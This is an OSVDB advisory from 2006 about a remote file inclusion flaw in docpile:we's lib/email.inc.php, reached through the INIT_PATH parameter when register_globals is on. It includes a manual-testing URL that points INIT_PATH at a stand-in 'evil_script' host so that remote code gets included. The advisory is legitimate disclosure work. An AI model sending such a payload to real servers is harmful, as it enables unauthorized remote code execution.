docpile:we lib/email.inc.php INIT_PATH Variable Remote File Inclusion

2006-08-08T06:35:19
ID OSVDB:27860
Type osvdb
Reporter xoron(x0r0n@hotmail.com)
Modified 2006-08-08T06:35:19

Description

Vulnerability Description

docpile:we contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the lib/email.inc.php script not properly sanitizing user input supplied to the 'INIT_PATH' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

docpile:we contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the lib/email.inc.php script not properly sanitizing user input supplied to the 'INIT_PATH' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

http://[target]/[path]/lib/email.inc.php?INIT_PATH=http://evil_script?

References:

Vendor URL: http://docpile-we.berlios.de/ Secunia Advisory ID:21412 Related OSVDB ID: 27861 Related OSVDB ID: 27859 Related OSVDB ID: 27865 Related OSVDB ID: 27866 Related OSVDB ID: 27862 Related OSVDB ID: 27863 Related OSVDB ID: 27864 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-08/0149.html FrSIRT Advisory: ADV-2006-3222 CVE-2006-4075